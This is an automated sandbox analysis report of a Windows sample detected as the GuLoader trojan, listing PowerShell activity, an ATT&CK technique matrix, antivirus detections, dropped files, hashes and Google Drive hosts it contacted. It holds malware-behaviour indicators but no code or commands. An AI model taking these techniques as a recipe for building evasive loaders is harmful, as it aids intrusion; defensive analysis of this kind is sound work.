Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

0_2_004031BB

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vq6jxdGvD6.exe	64%	Virustotal		Browse
vq6jxdGvD6.exe	71%	ReversingLabs	Win32.Trojan.GuLoader
vq6jxdGvD6.exe	100%	Avira	TR/Injector.rcalv

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe	100%	Avira	TR/Injector.rcalv
C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe	71%	ReversingLabs	Win32.Trojan.GuLoader

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.184.238	true	false		high
drive.usercontent.google.com	142.250.185.65	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.google.com	msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	vq6jxdGvD6.exe, vq6jxdGvD6.exe.2.dr	false	high
https://drive.google.com/:	msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330181183.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3353015327.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319145629.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3364613399.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/z	msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3069176977.0000000008951000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000006.00000003.3069103263.00000000089A0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/V	msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999392456.0000000008950000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/B	msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/t	msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/R	msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/r	msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3046183257.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3046245700.0000000008950000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/rj	msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.3128128204.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2928524613.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3116601337.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.0000000008921000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3104944814.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/j	msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3081860539.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	vq6jxdGvD6.exe, vq6jxdGvD6.exe.2.dr	false	high
https://drive.usercontent.google.com/~	msiexec.exe, 00000006.00000003.3128128204.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2928524613.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3116601337.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3104944814.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2928335469.0000000008953000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/rB	msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999392456.0000000008950000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/B	msiexec.exe, 00000006.00000003.3246654914.000000000894E000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.184.238	drive.google.com	United States		15169	GOOGLEUS	false
142.250.185.65	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587612
Start date and time:	2025-01-10 15:42:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vq6jxdGvD6.exe renamed because original name is a hash value
Original Sample Name:	f413458062741d65426d5191e98205f507572baef3d31c94c550a66fb888a6ba.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/14@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 42 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:43:51	API Interceptor	35x Sleep call for process: powershell.exe modified
09:45:07	API Interceptor	20x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Ub46mg9pn4.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.185.65
	fTSt7dc60O.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.185.65
	nRNzqQOQwk.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.185.65
	You7ynHizy.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.185.65
	Xjz8dblHDe.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.185.65
	zrNcqxZRSM.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	142.250.184.238 142.250.185.65
	CY SEC AUDIT PLAN 2025.docx.doc	Get hash	malicious	Unknown	Browse	142.250.184.238 142.250.185.65
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	142.250.184.238 142.250.185.65
	FIWszl1A8l.exe	Get hash	malicious	GhostRat	Browse	142.250.184.238 142.250.185.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll	AwMu7gR48D.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll	beNxougDFV.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll	AwMu7gR48D.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll	beNxougDFV.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31lo3jf4.fjl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5v4w4vq.s2q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thgbzmv3.ftu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynq54asu.kkv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
